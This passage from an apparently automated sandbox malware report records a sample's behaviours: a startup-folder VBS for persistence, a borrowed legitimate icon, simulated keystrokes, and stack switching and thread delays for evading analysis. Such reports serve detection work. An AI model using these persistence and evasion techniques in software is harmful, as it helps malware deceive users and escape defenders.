                    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Icon mismatch, binary includes an icon from a different legit application in order to fool users
                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (8).png
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_0047A330
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00434418
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_0047A330
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00434418
                    Source: C:\Users\user\Desktop\z1newpo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 411F254
                    Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 41D96AC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599433Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598736Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597983Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596670Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596283Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596166Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595978Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595621Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595391Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594577Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594016Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598430Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
